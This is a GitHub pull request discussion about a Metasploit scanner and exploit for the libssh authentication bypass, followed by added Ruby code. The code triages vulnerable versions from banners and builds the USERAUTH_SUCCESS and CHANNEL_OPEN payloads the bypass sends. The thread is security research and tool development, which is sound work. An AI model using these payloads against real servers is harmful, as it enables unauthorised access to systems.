Add libssh authentication bypass scanner/"exploit" #10820
Conversation
So you have shell/master channel but can't portfwd and such...? Digging in the ruby Net::SSH code, as I recall something similar happening a long time ago when refactoring the old "forked up" code we used to use. For real-world application, ping @timwr: looks like the majority of targets out there are mobile devices, and that's just on port 22, so probably rooted. Thanks @wvu-r7 Edit: so looking through net/ssh/authentication/methods/*rb, the #authenticate methods actually call #authenticate_with which calls session.next_message at least once. Might want to try and step the authenticate process along by pulling the next message from the server during the auth "process." I'll look more after work this evening
@sempervictus: I've been updating the PR description to respond to your questions. Thanks!
Hmm, looks like I don't get GH emails when the edits occur, pardon.
Roger that, thank you. Please see the referenced PR. I will be rebasing this one. |
Awesome, the PTY thing is beautiful :) |
@sempervictus: You linked to software using libssh2. They are separate libraries. |
oh jeez, thanks for catching that. |
I think we're spending more time writing libssh server code than exploiting it. 😅 |
Love how much GH accelerates this process - another example |
The example https://github.com/blacknbunny/libSSH-Authentication-Bypass above seems to have very similar issues to those observed in our testing. |
Any idea how I can find/setup an Android device that is vulnerable to this? |
There's https://tmate.io/ Interestingly, the static builds have not been updated since 2016: https://github.com/tmate-io/tmate/releases/tag/2.2.1 |
For the record, one of us tested tmate and ended up as a jailed nobody, so I think that's out. |
Rebasing to obtain #10833. |
Any thoughts to just getting a tunnel out of the exploit instead of a shell? Having a dynamic SOCKS5 tunnel could be VERY useful. Not sure if that's an option with the bypass or not |
The channels we can't evoke right now are actually instantiated (at least in ruby) for those transports. 100% agree tho (hence metassh back in the day). |
Probably good as a follow up. Would like to get this in tree to start with though. |
@mubix:
Now that I've "fixed" tl;dr If you can truly bypass auth and hit the right code paths to get to the right callbacks, you can open channels to your heart's content, including forwarding/tunneling. |
Release NotesThe |
Checking for patched versions was missed in this PR and added in #10835. Please update once that lands. Thank you. |
Looks like I figured out how to get SSH command output out of Metasploit. Please update when #10855 lands. Thanks. |
WIP (for those copying the module source): Use Git. :)
Please apply the supplied ssh_server_fork.patch to get RCE out of libssh.
New hotness above, old and busted below
This does in fact bypass authentication, and I can open a session channel, but I can't coerce any channel requests thereafter. I have tried numerous combinations of USERAUTH_{REQUEST,SUCCESS} with every CHANNEL_{OPEN,REQUEST}, including modifying OpenSSH to send the desired packets. Note that the USERAUTH_SUCCESS is sent OOB and in the opposite direction, so the server won't reply.
Update: this appears to work against https://git.libssh.org/projects/libssh.git/tree/examples/samplesshd-cb.c?h=libssh-0.8.3, but the callbacks are nothing more than print statements.
tl;dr We can bypass auth and even detect the vuln but can't get a shell against known code yet.
Failed testing against https://git.libssh.org/projects/libssh.git/tree/examples/ssh_server_fork.c?h=libssh-0.8.3 above. I also tested this strange piece of software: http://www.maxum.com/Rumpus/. Only the SFTP subsystem is exposed... and that channel request also fails.
In summary, it appears the example servers are incomplete, and while the auth bypass works, we can't get a real shell against any of the examples. The jury is still out on software using this library in a server capacity.
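As an added example (not code from this PR, from Metasploit or from libssh), the Ruby below puts the two things the thread talks about into wire form: a banner-based triage of a server's libssh version, and the payloads the bypass sends in order: SSH_MSG_USERAUTH_SUCCESS (type 52), which only a server is supposed to emit and which a client here sends before any USERAUTH_REQUEST, followed by SSH_MSG_CHANNEL_OPEN for a "session" channel. libssh shipped the fix in 0.7.6 and 0.8.4; treating 0.6.0 as the first affected release, and the window and packet sizes in the channel open, are this example's assumptions. The framing follows RFC 4253 section 6; in a real run those bytes go through the encrypted transport after key exchange (for instance Net::SSH's transport layer, as the module does), which this example does not establish, and a banner match is triage only, since a vendor may have backported the fix.

```ruby
# Added example, not from the Metasploit PR or from libssh.
# (1) banner triage of a libssh server against the releases that shipped the
# fix, and (2) the payloads the bypass sends: USERAUTH_SUCCESS (which only a
# server should send) followed by CHANNEL_OPEN "session", framed per RFC 4253.
require 'securerandom'

SSH_MSG_USERAUTH_SUCCESS = 52   # RFC 4252 section 5.1
SSH_MSG_CHANNEL_OPEN     = 90   # RFC 4254 section 5.1

# Assumption: affected from libssh 0.6.0; fixed in 0.7.6 (0.7 branch) and 0.8.4.
FIRST_AFFECTED = [0, 6, 0].freeze
FIXED_0_7      = [0, 7, 6].freeze
FIXED_0_8      = [0, 8, 4].freeze

# "SSH-2.0-libssh_0.8.3" or "SSH-2.0-libssh-0.7.2" -> [0, 8, 3]; nil if not libssh.
def libssh_version(banner)
  m = banner.strip.match(/\ASSH-2\.0-libssh[_-](\d+)\.(\d+)\.(\d+)/)
  m && m.captures.map(&:to_i)
end

# :not_libssh, :not_affected, :vulnerable or :patched, from the banner alone.
def triage(banner)
  v = libssh_version(banner)
  return :not_libssh unless v
  return :not_affected if (v <=> FIRST_AFFECTED) < 0
  fixed = v[1] <= 7 ? FIXED_0_7 : FIXED_0_8   # 0.9 and later compare above 0.8.4
  (v <=> fixed) < 0 ? :vulnerable : :patched
end

# RFC 4251 "string": uint32 big-endian length followed by the bytes.
def ssh_string(s)
  [s.bytesize].pack('N') + s.b
end

# The out-of-order message: a bare SSH_MSG_USERAUTH_SUCCESS, no fields.
def userauth_success_payload
  [SSH_MSG_USERAUTH_SUCCESS].pack('C')
end

# SSH_MSG_CHANNEL_OPEN "session" <sender channel> <initial window> <max packet>.
# Window and packet sizes are assumed defaults, not values from the PR.
def channel_open_session_payload(sender_channel, window = 0x200000, max_packet = 0x8000)
  [SSH_MSG_CHANNEL_OPEN].pack('C') + ssh_string('session') +
    [sender_channel, window, max_packet].pack('NNN')
end

# RFC 4253 section 6 binary packet: uint32 packet_length, byte padding_length,
# payload, random padding (at least 4 bytes; total a multiple of block_size).
# After key exchange this is what gets encrypted and MAC'd; the exchange itself
# is not performed here.
def frame_packet(payload, block_size = 8)
  padding_len = block_size - ((5 + payload.bytesize) % block_size)
  padding_len += block_size if padding_len < 4
  [1 + payload.bytesize + padding_len, padding_len].pack('NC') +
    payload.b + SecureRandom.random_bytes(padding_len)
end

# Constructed banners for a stand-alone run.
if __FILE__ == $PROGRAM_NAME
  ['SSH-2.0-libssh_0.8.3', 'SSH-2.0-libssh-0.7.2', 'SSH-2.0-libssh_0.8.4',
   'SSH-2.0-OpenSSH_7.4'].each { |b| puts "#{b.ljust(24)} #{triage(b)}" }
  puts frame_packet(userauth_success_payload).unpack1('H*')
  puts frame_packet(channel_open_session_payload(0)).unpack1('H*')
end
```

The triage step is what a scanner module would do before attempting anything; the two payload builders show why the bypass is a single byte followed by an ordinary channel open, and why, as noted above, the server has nothing to reply to the USERAUTH_SUCCESS itself.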